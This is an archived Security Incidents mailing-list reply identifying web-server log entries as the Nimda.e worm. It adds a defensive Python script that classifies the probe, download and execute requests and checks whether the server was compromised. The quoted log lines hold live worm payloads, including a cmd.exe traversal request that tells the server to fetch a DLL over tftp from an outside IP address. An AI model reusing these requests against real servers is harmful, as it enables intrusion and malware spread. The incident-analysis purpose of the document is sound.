Security Incidents mailing list archives

Re: New Worm Variant?


From: Ryan Russell <ryan () securityfocus com>
Date: Tue, 30 Oct 2001 10:08:42 -0700 (MST)

On Mon, 29 Oct 2001, Aj Effin Reznor wrote:

[29/Oct/2001:17:09:02 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 200 394 "-" "-"
[29/Oct/2001:17:09:11 -0800] "GET
/c/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll
HTTP/1.0" 200 449 "-" "-"
[29/Oct/2001:17:08:53 -0800] "GET /MSADC/httpodbc.dll HTTP/1.0" 404 330
"-" "-"

As someone pointed out, this is Nimda.e.  What's going on here is that
since your web server is responding with a 200 to the exploit attempt, it
thinks it has found a vulnerable victim.  So it issues the tftp command to
try and make your web server download a copy.  Then it sends a command to
try to execute the file it thinks it has caused you to download.

                                        Ryan
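As an added illustration of the three-stage sequence Ryan describes (this is not code from the original post, from the list, or from SecurityFocus), the script below parses the quoted access-log lines, labels each request as the probe, the download, or the execute attempt, and checks the two facts a defender wants from these lines: whether the probe was answered with a 200 (which is what makes the worm keep going) and whether the dropped file was ever actually served. The log field layout is assumed to match the quoted lines; the fourth, benign line is constructed for contrast.

```python
import re
from urllib.parse import unquote_plus

# Access-log lines as quoted in the post above (timestamp, request, status,
# bytes, referer, user-agent). The last line is a benign request constructed
# here for contrast and is not from the post.
LOG_LINES = [
    r'[29/Oct/2001:17:09:02 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 394 "-" "-"',
    r'[29/Oct/2001:17:09:11 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 449 "-" "-"',
    r'[29/Oct/2001:17:08:53 -0800] "GET /MSADC/httpodbc.dll HTTP/1.0" 404 330 "-" "-"',
    r'[29/Oct/2001:17:10:00 -0800] "GET /index.html HTTP/1.0" 200 1234 "-" "Mozilla/4.0"',
]

# Assumed field layout: [timestamp] "METHOD target PROTO" status size "referer" "ua"
LINE_RE = re.compile(
    r'^\[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Return a dict of fields, or None if the line is not in the expected shape."""
    m = LINE_RE.match(line)
    if not m:
        return None
    f = m.groupdict()
    f["status"] = int(f["status"])
    path, _, query = f["target"].partition("?")
    f["path"] = path.lower()
    f["query"] = unquote_plus(query).lower()  # '+' and %20 both become spaces
    return f


def classify(f):
    """Map a parsed request onto the three stages described in the post."""
    if "cmd.exe" in f["path"]:
        if "tftp" in f["query"]:
            return "download"  # cmd.exe told to fetch the worm body via tftp
        return "probe"         # cmd.exe told to run a harmless command (dir)
    if f["path"].endswith("/httpodbc.dll"):
        return "execute"       # request for the DLL the worm believes it planted
    return None


def analyze(lines):
    """Return one finding per worm-related line, in log order."""
    findings = []
    for line in lines:
        f = parse_line(line)
        if f is None:
            continue
        stage = classify(f)
        if stage is None:
            continue
        findings.append({"ts": f["ts"], "stage": stage, "status": f["status"]})
    return findings


def probe_looked_vulnerable(findings):
    """True if a cmd.exe probe was answered 200: the attacking host then treats
    this server as vulnerable and proceeds to the download and execute stages."""
    return any(x["stage"] == "probe" and x["status"] == 200 for x in findings)


def dropped_file_served(findings):
    """True only if the request for the dropped DLL succeeded, i.e. the tftp
    transfer actually placed a file on this server. A 404 means the file never
    arrived and the execute step failed."""
    return any(x["stage"] == "execute" and x["status"] == 200 for x in findings)


if __name__ == "__main__":
    fs = analyze(LOG_LINES)
    for x in fs:
        print(f'{x["ts"]}  {x["stage"]:<9} HTTP {x["status"]}')
    print("probe answered 200 (attacker will continue):", probe_looked_vulnerable(fs))
    print("dropped DLL actually present on server:", dropped_file_served(fs))
```

Run against the quoted lines, the probe and download stages show as 200 and the execute stage as 404, which is exactly the pattern of a non-Windows or non-IIS server that answers everything with 200 but never received the file: noisy, but not compromised. Returning a non-200 status (or no body) for cmd.exe requests is the cheapest way to stop the follow-up traffic.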


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

